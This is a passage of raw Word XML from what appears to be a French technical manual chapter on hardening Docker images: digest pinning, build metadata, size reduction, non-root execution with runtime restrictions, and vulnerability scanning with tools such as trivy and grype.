            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt install curl=8.5.0-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Date de construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Intégrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Argument stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre des fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Copie triée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux commandes d'épinglage · dockerfile</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Épinglage par empreinte : le plus strict</w:t>
        <w:br/>
        <w:t>FROM node:22.9.0-alpine3.20@sha256:4c2f3a1b... AS build</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mise à jour de l'empreinte : outil dédié</w:t>
        <w:br/>
        <w:t>docker pull node:22.9.0-alpine3.20</w:t>
        <w:br/>
        <w:t>docker inspect --format '{{index .RepoDigests 0}}' node:22.9.0-alpine3.20</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EMPREINTE D'IMAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Identifiant de contenu calculé sur l'ensemble des couches. Contrairement à une étiquette, il ne peut pas être déplacé vers un autre contenu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux informations traçables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Construction avec des arguments de compilation et des métadonnées</w:t>
        <w:br/>
        <w:t>docker build \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --build-arg VERSION=$(git describe --tags --always) \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --build-arg COMMIT=$(git rev-parse --short HEAD) \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.revision=$COMMIT \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t registry.exemple.fr/app:1.4.2 .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>63.2 Réduire la taille</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image plus petite se télécharge plus vite, contient moins de composants vulnérables et expose moins de binaires utilisables par un attaquant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.226 — Cinq techniques de réduction</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09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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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Gain typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Multi-étapes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>50 à 90 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Seul l'artefact final est conservé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Image de base minimale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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30 à 70 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Alpine, distroless, scratch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suppression des caches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5 à 15 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>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Dans la même couche </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RUN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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.dockerignore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Évite d'envoyer l'inutile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas de compilateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construire ailleurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une seule couche, aucun résidu · dockerfile</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Mauvais : le cache reste dans l'image</w:t>
        <w:br/>
        <w:t>RUN apt-get update &amp;&amp; apt-get install -y curl</w:t>
        <w:br/>
        <w:br/>
        <w:t># Bon : mise à jour, installation et nettoyage dans une seule couche</w:t>
        <w:br/>
        <w:t>RUN apt-get update \</w:t>
        <w:br/>
        <w:t xml:space="preserve"> &amp;&amp; apt-get install -y --no-install-recommends curl \</w:t>
        <w:br/>
        <w:t xml:space="preserve"> &amp;&amp; rm -rf /var/lib/apt/lists/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois outils d'analyse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Vérifier la taille et le contenu</w:t>
        <w:br/>
        <w:t>docker images app</w:t>
        <w:br/>
        <w:t>docker history app:1.4.2</w:t>
        <w:br/>
        <w:t>dive app:1.4.2        # exploration interactive des couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>63.3 Exécuter sans privilèges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Par défaut, le processus d'un conteneur est root. Une évasion ou une faille applicative donne alors des droits élevés à l'intérieur, et parfois au-delà.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux lignes suffisent · dockerfile</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Créer un utilisateur et basculer avant la commande finale</w:t>
        <w:br/>
        <w:t>FROM node:22.9.0-alpine3.20</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY --chown=node:node . .</w:t>
        <w:br/>
        <w:t>USER node</w:t>
        <w:br/>
        <w:t>CMD ["node", "server.js"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq restrictions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Au niveau de l'exécution</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --user 10001:10001 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --read-only \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --tmpfs /tmp \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cap-drop ALL \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --security-opt no-new-privileges \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mon-app:1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.227 — Cinq restrictions d'exécution</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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>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Contrepartie</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--read-only</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Système de fichiers immuable</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Prévoir un volume pour les écritures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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--cap-drop ALL</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Supprime les capacités</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En réaccorder si nécessaire</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>no-new-privileges</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Bloque l'élévation</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Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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--user</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Utilisateur non privilégié</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Droits sur les volumes</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--tmpfs /tmp</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Espace temporaire en mémoire</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Consommation RAM</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MONTER LE SOCKET DOCKER DONNE LES PLEINS POUVOIRS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-v /var/run/docker.sock:/var/run/docker.sock</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> permet à un conteneur de créer un conteneur privilégié sur l'hôte. C'est une évasion de privilèges immédiate ; ne l'accordez jamais à un conteneur non fiable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>63.4 Analyser les vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image contient un système d'exploitation en réduction : ses paquets ont des vulnérabilités connues. L'analyse doit être automatisée, sinon elle n'est jamais faite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq outils d'analyse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Analyse locale</w:t>
        <w:br/>
        <w:t>docker scout quickview app:1.4.2</w:t>
        <w:br/>
        <w:t>docker scout cves app:1.4.2 --only-severity critical,high</w:t>
        <w:br/>
        <w:br/>
        <w:t># Alternatives</w:t>
        <w:br/>
        <w:t>trivy image --severity HIGH,CRITICAL app:1.4.2</w:t>
        <w:br/>
        <w:t>grype app:1.4.2 --fail-on high</w:t>
        <w:br/>
        <w:br/>
        <w:t># Analyse du Dockerfile</w:t>
        <w:br/>
        <w:t>hadolint Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rapport lisible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Exemple de sortie trivy</w:t>
        <w:br/>
        <w:br/>
        <w:t>app:1.4.2 (alpine 3.20.3)</w:t>
        <w:br/>
        <w:t>Total: 3 (HIGH: 2, CRITICAL: 1)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  ┌────────────┬────────────────┬──────────┬───────────────────┐</w:t>
        <w:br/>
        <w:t>│  Library   │ Vulnerability  │ Severity │ Installed Version │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├────────────┼────────────────┼──────────┼───────────────────┤</w:t>
        <w:br/>
        <w:t>│ libcrypto3 │ CVE-2026-12345 │ CRITICAL │ 3.3.1-r0          │</w:t>
        <w:br/>
        <w:t>│ libssl3    │ CVE-2026-12346 │ HIGH     │ 3.3.1-r0          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">  └────────────┴────────────────┴──────────┴───────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.228 — Quatre niveaux et leurs délais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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Délai de correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Critique</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24 heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bloquer la publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Élevée</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7 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Planifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyenne</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30 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suivi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Faible</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Prochain cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Documenter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
